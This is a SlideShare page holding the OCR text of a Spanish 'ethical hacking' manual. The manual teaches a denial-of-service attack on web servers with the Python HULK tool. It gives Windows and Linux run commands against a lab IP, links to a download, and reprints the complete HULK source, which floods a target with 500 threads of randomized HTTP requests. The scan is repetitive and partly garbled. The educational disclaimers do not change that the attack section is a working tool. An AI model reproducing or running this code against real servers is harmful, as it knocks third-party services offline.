SlideShare una empresa de Scribd logo

Manual de pentesting_sobre_ataque_web_python_hulk

White Hat Mexico
White Hat Mexico

El documento describe un libro sobre hacking ético que incluye instrucciones para realizar ataques de denegación de servicio (DoS) controlados contra servidores web con el programa Python Hulk. Explica cómo instalar Python e implementar el ataque en Windows y Linux, advirtiendo que los ejemplos son solo con fines educativos y no deben usarse para dañar sistemas ajenos.

Internet
1 de 15
Descargar para leer sin conexión
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat.mexico@gmail.com Página 1
Libro de Et Contacto: whitehat.mexico@gmail.com Edición Descubre como es el LSCA, Carlos Alberto Castruita Rodríguez Edición impresa en PDF protegida contra impresión y sobre escritura. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. @gmail.com Edición patrocinada por WhiteHat México el Arte del Hacking de una visión de un White Hat. Por Carlos Alberto Castruita Rodríguez Edición Independiente © 2015 impresa en PDF protegida contra impresión y sobre escritura. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING al Hacking para entrenamiento sobre ataques informáticos. Página 2 Arte del Hacking de una visión de un White Hat. Carlos Alberto Castruita Rodríguez impresa en PDF protegida contra impresión y sobre escritura.
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat.mexico@gmail.com Página 3 Descubre desde cero como es Arte del Hacking de una visión de un White Hat. El libro de PENTESTING y de SEGURIDAD INFORMATICA está diseñado para hacer pruebas de vulnerabilidad de seguridad informática, robo de información y espionaje de datos, narrado a un nivel técnico para gentes con conocimiento de nivel básico a medio del área de informática o soporte técnico en sistemas. Autor: Carlos Alberto Castruita Rodríguez Director de WhiteHat - México Con 20 años de experiencia en el área sistemas. Certificado Hellermann Tyton Certificado 3com Networks Ethical Hacker Certificado Contacto: carlos.castruita@whitehatmexico.tk
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat.mexico@gmail.com Página 4 ATAQUE A SERVIDORES WEB “ HULK ” Ataque de denegación de servicio con Python Hulk Se trata de un cliente HTTP capaz de provocar una denegación de servicio (DoS) a servidores web con poco uso de ancho de banda. Dicho cliente HTTP intenta abrir tantas conexiones como pueda al servidor web e intenta mantenerlas abiertas tanto tiempo como sea posible. Periódicamente para evitar que el servidor web cierre la conexión va añadiendo headers a la petición HTTP sin llegar a finalizarla nunca. Vamos a realizar un ataque controlado ya que si atacamos un servidor establecido incurriremos en un delito. Levante un servidor con IIS y monte el WampServer para poner una simple página web hecha en WordPress.
Libro de Et Contacto: whitehat.mexico@gmail.com Nuestro servidor web tiene la siguiente IP 192.168.0.100 Lo verificamos con el comando ipconfig El ataque lo haremos con una versión viejita de Python la versión 2.7 Esta versión funciona hasta Windows XP. En Windows 7 y 8 ya se baja otra versión. Acezamos al folder de Python desde modo Dos. Python 2.7 lo puedes descargar de GRATIS al final de la explicación. Hulk descárgalo igual al final de este mismo. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. @gmail.com Nuestro servidor web tiene la siguiente IP 192.168.0.100 Lo verificamos con el comando ipconfig os con una versión viejita de Python la versión 2.7.5 Esta versión funciona hasta Windows XP. En Windows 7 y 8 ya se baja otra versión. al folder de Python desde modo Dos. escargar de GRATIS al final de la explicación. descárgalo igual al final de este mismo. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING al Hacking para entrenamiento sobre ataques informáticos. Página 5 Esta versión funciona hasta Windows XP. En Windows 7 y 8 ya se baja otra versión.
Libro de Et Contacto: whitehat.mexico@gmail.com SINTAXIS: python.exe >> ESCRIBIR: python.exe Y ahora si prepárense, por que el servidor WEB se va a colapsar. Haremos el mismo ejerció en Linux. En Ubuntu es muy fácil instalar el Python. Iremos al centro de Software que maneja Ubuntu y después seleccionamos la opción EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. @gmail.com python.exe hulk.py <Url> python.exe hulk.py http://192.168.0.100 { INTRO } Y ahora si prepárense, por que el servidor WEB se va a colapsar. en Linux. En Ubuntu es muy fácil instalar el Python. Iremos al centro de Software que maneja Ubuntu y después seleccionamos la opción Herramienta para Desarrolladores. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING al Hacking para entrenamiento sobre ataques informáticos. Página 6 { INTRO } En Ubuntu es muy fácil instalar el Python. Iremos al centro de Software que maneja Herramienta para Desarrolladores.
Libro de Et Contacto: whitehat.mexico@gmail.com Ahora escogemos Python y lo instalamos. Ya instalado el Python abrimos una El archivo Hulk.py lo pegamos en Personal Folder para que no te sea difícil el llamar el archivo. Usaremos la misma sintaxis que usamos dentro de Windows. SINTAXIS: python.exe >> ESCRIBIR: python.exe EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. @gmail.com escogemos Python y lo instalamos. Ya instalado el Python abrimos una terminal, recuerda que se abre con CTRL+ALT+ Hulk.py lo pegamos en Personal Folder para que no te sea difícil el llamar el la misma sintaxis que usamos dentro de Windows. python.exe hulk.py <Url> python.exe hulk.py http://192.168.0.100 { INTRO } EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING al Hacking para entrenamiento sobre ataques informáticos. Página 7 terminal, recuerda que se abre con CTRL+ALT+T. Hulk.py lo pegamos en Personal Folder para que no te sea difícil el llamar el { INTRO }
Libro de Et Contacto: whitehat.mexico@gmail.com Ahora nos aparecerá el letrero El ataque se ha iniciado y dejaremos que se envíen las peticiones al server. NOTA IMPORTANTE: Estos ejercicios de ataques son entidad gubernamental, son ataques 100% controlados. Es bajo propia responsabilidad del lector, el uso que haga de estos conocimientos. Yo como escritor e investigador de técnicas de ataque a medios uno de mis ejercicios de ataques a redes, servidores, equipos son bajo ambiente controlado, con infraestructura propia y no causando daño a terceros. Expongo los ejercicios que yo como técnico dejo visto como un Black Hacker puede atacar un equipo electrónico. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. @gmail.com Ahora nos aparecerá el letrero – HULK Attack Started – El ataque se ha iniciado y dejaremos que se envíen las peticiones al server. Estos ejercicios de ataques son con fines didácticos y no atacamos a ninguna empresa ni entidad gubernamental, son ataques 100% controlados. Es bajo propia responsabilidad del lector, el uso que haga de estos conocimientos. Yo como escritor e investigador de técnicas de ataque a medios informáticos uno de mis ejercicios de ataques a redes, servidores, equipos informáticos son bajo ambiente controlado, con infraestructura propia y no causando daño a terceros. Expongo los ejercicios que yo como técnico informático a mi persona me han funcionado y dejo visto como un Black Hacker puede atacar un equipo electrónico. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING al Hacking para entrenamiento sobre ataques informáticos. Página 8 El ataque se ha iniciado y dejaremos que se envíen las peticiones al server. con fines didácticos y no atacamos a ninguna empresa ni Es bajo propia responsabilidad del lector, el uso que haga de estos conocimientos. informáticos, que cada informáticos y telefónicos son bajo ambiente controlado, con infraestructura propia y no causando daño a terceros. a mi persona me han funcionado y
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat.mexico@gmail.com Página 9 Anexo copia del código fuente de Hulk desarrollado por Barry Shteiman # ---------------------------------------------------------------------------------------------- # HULK - HTTP Unbearable Load King # # this tool is a dos tool that is meant to put heavy load on HTTP servers in order to bring them # to their knees by exhausting the resource pool, its is meant for research purposes only # and any malicious usage of this tool is prohibited. # # author : Barry Shteiman , version 1.0 # ---------------------------------------------------------------------------------------------- import urllib2 import sys import threading import random import re #global params url='' host='' headers_useragents=[] headers_referers=[] request_counter=0 flag=0 safe=0 def inc_counter(): global request_counter
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat.mexico@gmail.com Página 10 request_counter+=1 def set_flag(val): global flag flag=val def set_safe(): global safe safe=1 # generates a user agent array def useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') return(headers_useragents)
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat.mexico@gmail.com Página 11 # generates a referer array def referer_list(): global headers_referers headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://' + host + '/') return(headers_referers) #builds random ascii string def buildblock(size): out_str = '' for i in range(0, size): a = random.randint(65, 90) out_str += chr(a) return(out_str) def usage(): print '---------------------------------------------------' print 'USAGE: python hulk.py <url>' print 'you can add "safe" after url, to autoshut after dos' print '---------------------------------------------------' #http request def httpcall(url): useragent_list() referer_list()
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat.mexico@gmail.com Página 12 code=0 if url.count("?")>0: param_joiner="&" else: param_joiner="?" request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection', 'keep-alive') request.add_header('Host',host) try: urllib2.urlopen(request) except urllib2.HTTPError, e: #print e.code set_flag(1) print 'Response Code 500' code=500 except urllib2.URLError, e: #print e.reason sys.exit() else: inc_counter() urllib2.urlopen(request) return(code)
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat.mexico@gmail.com Página 13 #http caller thread class HTTPThread(threading.Thread): def run(self): try: while flag<2: code=httpcall(url) if (code==500) & (safe==1): set_flag(2) except Exception, ex: pass # monitors http threads and counts requests class MonitorThread(threading.Thread): def run(self): previous=request_counter while flag==0: if (previous+100<request_counter) & (previous<>request_counter): print "%d Requests Sent" % (request_counter) previous=request_counter if flag==2: print "n-- HULK Attack Finished --" #execute if len(sys.argv) < 2: usage() sys.exit() else: if sys.argv[1]=="help": usage()
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat.mexico@gmail.com Página 14 sys.exit() else: print "-- HULK Attack Started --" if len(sys.argv)== 3: if sys.argv[2]=="safe": set_safe() url = sys.argv[1] if url.count("/")==2: url = url + "/" m = re.search('http://([^/]*)/?.*', url) host = m.group(1) for i in range(500): t = HTTPThread() t.start() t = MonitorThread() t.start() Es muy fácil entender la lógica de funcionamiento del código y uno puede hasta hacerle mejoras al mismo código pero como indica el mismo autor del mismo que es un delito el uso malicioso para ataque DOS.
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat.mexico@gmail.com Página 15 BONUS Descargas de Software libre de Compra de Licencia. WhiteHat México tiene esas aplicaciones en la nube, listas para descargar. WINDOWS: • Python 2.7.5 URL: QR: • Hulk URL: https://mega.co.nz/#!OIpCDTgA!ikGOVC833_Y0nGtVsgXJPqmjfvcpqpNj19yjdVrdS80 QR:

Recomendados

Manual de pentesting_sobre_ataque_a_servidores_apache_1.x_2.x_con_linux_y_per...
Manual de pentesting_sobre_ataque_a_servidores_apache_1.x_2.x_con_linux_y_per...Manual de pentesting_sobre_ataque_a_servidores_apache_1.x_2.x_con_linux_y_per...
Manual de pentesting_sobre_ataque_a_servidores_apache_1.x_2.x_con_linux_y_per...White Hat Mexico
 
Manual de pentesting_sobre_tipos_de_hackers
Manual de pentesting_sobre_tipos_de_hackersManual de pentesting_sobre_tipos_de_hackers
Manual de pentesting_sobre_tipos_de_hackersWhite Hat Mexico
 
Manual de pentesting_sobre_servicios_de_hacking_etico
Manual de pentesting_sobre_servicios_de_hacking_eticoManual de pentesting_sobre_servicios_de_hacking_etico
Manual de pentesting_sobre_servicios_de_hacking_eticoWhite Hat Mexico
 
Manual de Seguridad Informatica sobre Ataque Web LOIC
Manual de Seguridad Informatica sobre Ataque Web LOICManual de Seguridad Informatica sobre Ataque Web LOIC
Manual de Seguridad Informatica sobre Ataque Web LOICWhite Hat Mexico
 
Autopsia De Una Intrusion
Autopsia De Una IntrusionAutopsia De Una Intrusion
Autopsia De Una IntrusionChema Alonso
 
El libro negro del hacker
El libro negro del hackerEl libro negro del hacker
El libro negro del hackermaster192
 
Hxc3
Hxc3Hxc3
Hxc3rubenroa
 
haker Spoofing
haker Spoofinghaker Spoofing
haker SpoofingLorenzo Vela Morales
 

Recomendados

Manual de pentesting_sobre_ataque_a_servidores_apache_1.x_2.x_con_linux_y_per...
Manual de pentesting_sobre_ataque_a_servidores_apache_1.x_2.x_con_linux_y_per...Manual de pentesting_sobre_ataque_a_servidores_apache_1.x_2.x_con_linux_y_per...
Manual de pentesting_sobre_ataque_a_servidores_apache_1.x_2.x_con_linux_y_per...White Hat Mexico
 
Manual de pentesting_sobre_tipos_de_hackers
Manual de pentesting_sobre_tipos_de_hackersManual de pentesting_sobre_tipos_de_hackers
Manual de pentesting_sobre_tipos_de_hackersWhite Hat Mexico
 
Manual de pentesting_sobre_servicios_de_hacking_etico
Manual de pentesting_sobre_servicios_de_hacking_eticoManual de pentesting_sobre_servicios_de_hacking_etico
Manual de pentesting_sobre_servicios_de_hacking_eticoWhite Hat Mexico
 
Manual de Seguridad Informatica sobre Ataque Web LOIC
Manual de Seguridad Informatica sobre Ataque Web LOICManual de Seguridad Informatica sobre Ataque Web LOIC
Manual de Seguridad Informatica sobre Ataque Web LOICWhite Hat Mexico
 
Autopsia De Una Intrusion
Autopsia De Una IntrusionAutopsia De Una Intrusion
Autopsia De Una IntrusionChema Alonso
 
El libro negro del hacker
El libro negro del hackerEl libro negro del hacker
El libro negro del hackermaster192
 
Hxc3
Hxc3Hxc3
Hxc3rubenroa
 
haker Spoofing
haker Spoofinghaker Spoofing
haker SpoofingLorenzo Vela Morales
 
Hxc2
Hxc2Hxc2
Hxc2rubenroa
 
Hakers
HakersHakers
HakersAexandrapf
 
002
002002
002Gonzalo Rooswelth Cano Velasquez
 
Hackeo
HackeoHackeo
Hackeoseminario4
 
Proyecto 002 de 20111
Proyecto 002 de 20111Proyecto 002 de 20111
Proyecto 002 de 20111Lilian Barrios
 
Reporte de Seguridad
Reporte de SeguridadReporte de Seguridad
Reporte de Seguridadkiensoiyo
 
Deep web luis elian vallejo 10 b
Deep web luis elian vallejo 10 bDeep web luis elian vallejo 10 b
Deep web luis elian vallejo 10 bluiselian2005
 
Curso de hacking avanzado
Curso de hacking avanzadoCurso de hacking avanzado
Curso de hacking avanzadoYULI-CASTRO
 
Seguridad y ataques de im en entornos corporativos
Seguridad y ataques de im en entornos corporativosSeguridad y ataques de im en entornos corporativos
Seguridad y ataques de im en entornos corporativosTensor
 
Google hacking para pentesters
Google hacking para pentestersGoogle hacking para pentesters
Google hacking para pentestersAlejandro Rivera Santander
 
Autenticacion Doble Factor
Autenticacion Doble FactorAutenticacion Doble Factor
Autenticacion Doble FactorChema Alonso
 
Comoconvertirseenhacker encrudo
Comoconvertirseenhacker encrudoComoconvertirseenhacker encrudo
Comoconvertirseenhacker encrudoevamonica Coco Fraile
 
Deep web
Deep webDeep web
Deep webalejo rey
 
Delitos informaticos (1)
Delitos informaticos (1)Delitos informaticos (1)
Delitos informaticos (1)Alex Mejia
 
Penetración con una Backdoor
Penetración con una BackdoorPenetración con una Backdoor
Penetración con una BackdoorNEGOCIOS PROPIOS
 
taringa
taringa taringa
taringasommer diaz
 
Presentacion ROS Delitos v ID CIDE PGR SRE DF 2016
Presentacion ROS Delitos v ID CIDE PGR SRE DF 2016Presentacion ROS Delitos v ID CIDE PGR SRE DF 2016
Presentacion ROS Delitos v ID CIDE PGR SRE DF 2016Rodrigo Orenday Serratos
 
Seguridad informática mafe
Seguridad informática mafeSeguridad informática mafe
Seguridad informática mafeMaria Sanchez
 
Informatica
InformaticaInformatica
Informaticakaren_1013
 
Seguridad informatica jolaine gomes y vaneiris cervantes
Seguridad informatica jolaine gomes y vaneiris cervantesSeguridad informatica jolaine gomes y vaneiris cervantes
Seguridad informatica jolaine gomes y vaneiris cervantesbelrosy
 
Seguridad, informatica(robo de identidad, amenazas de virus)
Seguridad, informatica(robo de identidad, amenazas de virus)Seguridad, informatica(robo de identidad, amenazas de virus)
Seguridad, informatica(robo de identidad, amenazas de virus)Norma Flores
 
Seguridad de la informacion mitos y tecnologias
Seguridad de la informacion mitos y tecnologiasSeguridad de la informacion mitos y tecnologias
Seguridad de la informacion mitos y tecnologiasMaurice Frayssinet
 

Más contenido relacionado

La actualidad más candente

Reporte de Seguridad
Reporte de SeguridadReporte de Seguridad
Reporte de Seguridadkiensoiyo
 
Deep web luis elian vallejo 10 b
Deep web luis elian vallejo 10 bDeep web luis elian vallejo 10 b
Deep web luis elian vallejo 10 bluiselian2005
 
Curso de hacking avanzado
Curso de hacking avanzadoCurso de hacking avanzado
Curso de hacking avanzadoYULI-CASTRO
 
Seguridad y ataques de im en entornos corporativos
Seguridad y ataques de im en entornos corporativosSeguridad y ataques de im en entornos corporativos
Seguridad y ataques de im en entornos corporativosTensor
 
Autenticacion Doble Factor
Autenticacion Doble FactorAutenticacion Doble Factor
Autenticacion Doble FactorChema Alonso
 
Delitos informaticos (1)
Delitos informaticos (1)Delitos informaticos (1)
Delitos informaticos (1)Alex Mejia
 
Penetración con una Backdoor
Penetración con una BackdoorPenetración con una Backdoor
Penetración con una BackdoorNEGOCIOS PROPIOS
 

La actualidad más candente (16)

Hxc2
Hxc2Hxc2
Hxc2
 
Hakers
HakersHakers
Hakers
 
002
002002
002
 
Hackeo
HackeoHackeo
Hackeo
 
Proyecto 002 de 20111
Proyecto 002 de 20111Proyecto 002 de 20111
Proyecto 002 de 20111
 
Reporte de Seguridad
Reporte de SeguridadReporte de Seguridad
Reporte de Seguridad
 
Deep web luis elian vallejo 10 b
Deep web luis elian vallejo 10 bDeep web luis elian vallejo 10 b
Deep web luis elian vallejo 10 b
 
Curso de hacking avanzado
Curso de hacking avanzadoCurso de hacking avanzado
Curso de hacking avanzado
 
Seguridad y ataques de im en entornos corporativos
Seguridad y ataques de im en entornos corporativosSeguridad y ataques de im en entornos corporativos
Seguridad y ataques de im en entornos corporativos
 
Google hacking para pentesters
Google hacking para pentestersGoogle hacking para pentesters
Google hacking para pentesters
 
Autenticacion Doble Factor
Autenticacion Doble FactorAutenticacion Doble Factor
Autenticacion Doble Factor
 
Comoconvertirseenhacker encrudo
Comoconvertirseenhacker encrudoComoconvertirseenhacker encrudo
Comoconvertirseenhacker encrudo
 
Deep web
Deep webDeep web
Deep web
 
Delitos informaticos (1)
Delitos informaticos (1)Delitos informaticos (1)
Delitos informaticos (1)
 
Penetración con una Backdoor
Penetración con una BackdoorPenetración con una Backdoor
Penetración con una Backdoor
 
taringa
taringa taringa
taringa
 

Destacado

Presentacion ROS Delitos v ID CIDE PGR SRE DF 2016
Presentacion ROS Delitos v ID CIDE PGR SRE DF 2016Presentacion ROS Delitos v ID CIDE PGR SRE DF 2016
Presentacion ROS Delitos v ID CIDE PGR SRE DF 2016Rodrigo Orenday Serratos
 
Seguridad informática mafe
Seguridad informática mafeSeguridad informática mafe
Seguridad informática mafeMaria Sanchez
 
Seguridad informatica jolaine gomes y vaneiris cervantes
Seguridad informatica jolaine gomes y vaneiris cervantesSeguridad informatica jolaine gomes y vaneiris cervantes
Seguridad informatica jolaine gomes y vaneiris cervantesbelrosy
 
Seguridad, informatica(robo de identidad, amenazas de virus)
Seguridad, informatica(robo de identidad, amenazas de virus)Seguridad, informatica(robo de identidad, amenazas de virus)
Seguridad, informatica(robo de identidad, amenazas de virus)Norma Flores
 
Seguridad de la informacion mitos y tecnologias
Seguridad de la informacion mitos y tecnologiasSeguridad de la informacion mitos y tecnologias
Seguridad de la informacion mitos y tecnologiasMaurice Frayssinet
 
De las sanciones y politicas de reinsercion a los adolecentes que trasgreden ...
De las sanciones y politicas de reinsercion a los adolecentes que trasgreden ...De las sanciones y politicas de reinsercion a los adolecentes que trasgreden ...
De las sanciones y politicas de reinsercion a los adolecentes que trasgreden ...elmejor122
 
Delitos informaticos
Delitos informaticosDelitos informaticos
Delitos informaticosJuan Dii
 
Acceso ilícito a sistemas informáticos megor
Acceso ilícito a sistemas informáticos megorAcceso ilícito a sistemas informáticos megor
Acceso ilícito a sistemas informáticos megorDiiana Maquera
 
Mal uso De La Informatica
Mal uso De La InformaticaMal uso De La Informatica
Mal uso De La InformaticaCristian Mendez
 
Delitos Informaticos
Delitos InformaticosDelitos Informaticos
Delitos Informaticosxsercom
 
RIESGOS BAJO LOS CUALES SE ENCUENTRAN LOS SISTEMAS DE INFORMACION
RIESGOS BAJO LOS CUALES SE ENCUENTRAN LOS SISTEMAS DE INFORMACIONRIESGOS BAJO LOS CUALES SE ENCUENTRAN LOS SISTEMAS DE INFORMACION
RIESGOS BAJO LOS CUALES SE ENCUENTRAN LOS SISTEMAS DE INFORMACIONCristian Calvo
 
Delitos informáticos
Delitos informáticos Delitos informáticos
Delitos informáticos lisc20145
 
Robo de identidad
Robo de identidadRobo de identidad
Robo de identidadmarvie4
 
Delitos informaticos
Delitos informaticosDelitos informaticos
Delitos informaticosrociohidalgor
 
Expo delitos informaticos
Expo delitos informaticosExpo delitos informaticos
Expo delitos informaticosDarianny Paez
 
Delitos informaticos
Delitos informaticosDelitos informaticos
Delitos informaticosgustavoegg
 
Los riesgos y amenazas de la información
Los riesgos y amenazas de la informaciónLos riesgos y amenazas de la información
Los riesgos y amenazas de la informaciónPSM
 

Destacado (20)

Presentacion ROS Delitos v ID CIDE PGR SRE DF 2016
Presentacion ROS Delitos v ID CIDE PGR SRE DF 2016Presentacion ROS Delitos v ID CIDE PGR SRE DF 2016
Presentacion ROS Delitos v ID CIDE PGR SRE DF 2016
 
Seguridad informática mafe
Seguridad informática mafeSeguridad informática mafe
Seguridad informática mafe
 
Informatica
InformaticaInformatica
Informatica
 
Seguridad informatica jolaine gomes y vaneiris cervantes
Seguridad informatica jolaine gomes y vaneiris cervantesSeguridad informatica jolaine gomes y vaneiris cervantes
Seguridad informatica jolaine gomes y vaneiris cervantes
 
Seguridad, informatica(robo de identidad, amenazas de virus)
Seguridad, informatica(robo de identidad, amenazas de virus)Seguridad, informatica(robo de identidad, amenazas de virus)
Seguridad, informatica(robo de identidad, amenazas de virus)
 
Seguridad de la informacion mitos y tecnologias
Seguridad de la informacion mitos y tecnologiasSeguridad de la informacion mitos y tecnologias
Seguridad de la informacion mitos y tecnologias
 
El Delito Informatico
El Delito InformaticoEl Delito Informatico
El Delito Informatico
 
De las sanciones y politicas de reinsercion a los adolecentes que trasgreden ...
De las sanciones y politicas de reinsercion a los adolecentes que trasgreden ...De las sanciones y politicas de reinsercion a los adolecentes que trasgreden ...
De las sanciones y politicas de reinsercion a los adolecentes que trasgreden ...
 
Delitos informaticos
Delitos informaticosDelitos informaticos
Delitos informaticos
 
Acceso ilícito a sistemas informáticos megor
Acceso ilícito a sistemas informáticos megorAcceso ilícito a sistemas informáticos megor
Acceso ilícito a sistemas informáticos megor
 
Mal uso De La Informatica
Mal uso De La InformaticaMal uso De La Informatica
Mal uso De La Informatica
 
Delitos Informaticos
Delitos InformaticosDelitos Informaticos
Delitos Informaticos
 
RIESGOS BAJO LOS CUALES SE ENCUENTRAN LOS SISTEMAS DE INFORMACION
RIESGOS BAJO LOS CUALES SE ENCUENTRAN LOS SISTEMAS DE INFORMACIONRIESGOS BAJO LOS CUALES SE ENCUENTRAN LOS SISTEMAS DE INFORMACION
RIESGOS BAJO LOS CUALES SE ENCUENTRAN LOS SISTEMAS DE INFORMACION
 
Seguridad de la información - Virus
Seguridad de la información - VirusSeguridad de la información - Virus
Seguridad de la información - Virus
 
Delitos informáticos
Delitos informáticos Delitos informáticos
Delitos informáticos
 
Robo de identidad
Robo de identidadRobo de identidad
Robo de identidad
 
Delitos informaticos
Delitos informaticosDelitos informaticos
Delitos informaticos
 
Expo delitos informaticos
Expo delitos informaticosExpo delitos informaticos
Expo delitos informaticos
 
Delitos informaticos
Delitos informaticosDelitos informaticos
Delitos informaticos
 
Los riesgos y amenazas de la información
Los riesgos y amenazas de la informaciónLos riesgos y amenazas de la información
Los riesgos y amenazas de la información
 

Similar a Manual de pentesting_sobre_ataque_web_python_hulk

Manual de pentesting_sobre_ataque_a_encirptado_wep_con_backtrack_5
Manual de pentesting_sobre_ataque_a_encirptado_wep_con_backtrack_5Manual de pentesting_sobre_ataque_a_encirptado_wep_con_backtrack_5
Manual de pentesting_sobre_ataque_a_encirptado_wep_con_backtrack_5White Hat Mexico
 
Webinar Gratuito: Crear un Medio Infectado con Metasploit Framework
Webinar Gratuito: Crear un Medio Infectado con Metasploit FrameworkWebinar Gratuito: Crear un Medio Infectado con Metasploit Framework
Webinar Gratuito: Crear un Medio Infectado con Metasploit FrameworkAlonso Caballero
 
Seguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correaSeguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correasebascorrea27
 
Seguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correaSeguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correasebascorrea27
 
Web App Hacking and Penetration Testing - (RFI - LFI & RCE)
Web App Hacking and Penetration Testing - (RFI - LFI & RCE) Web App Hacking and Penetration Testing - (RFI - LFI & RCE)
Web App Hacking and Penetration Testing - (RFI - LFI & RCE) Jose Gonzales
 
PRESENTACION DOS
PRESENTACION DOSPRESENTACION DOS
PRESENTACION DOSmirofa
 
Ingenieria social.hack04ndalus
Ingenieria social.hack04ndalusIngenieria social.hack04ndalus
Ingenieria social.hack04ndalusYesid Rodriguez
 
proyecto cracker
proyecto crackerproyecto cracker
proyecto crackerW_Segarra
 
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...RootedCON
 
Eres más hackeable de lo que piensas
Eres más hackeable de lo que piensasEres más hackeable de lo que piensas
Eres más hackeable de lo que piensasRoberto Garcia Amoriz
 
Eres más hackeable de lo que crees
Eres más hackeable de lo que creesEres más hackeable de lo que crees
Eres más hackeable de lo que creesRober Garamo
 
Hackin9 - Ataques de tipo HTML injection
Hackin9 - Ataques de tipo HTML injectionHackin9 - Ataques de tipo HTML injection
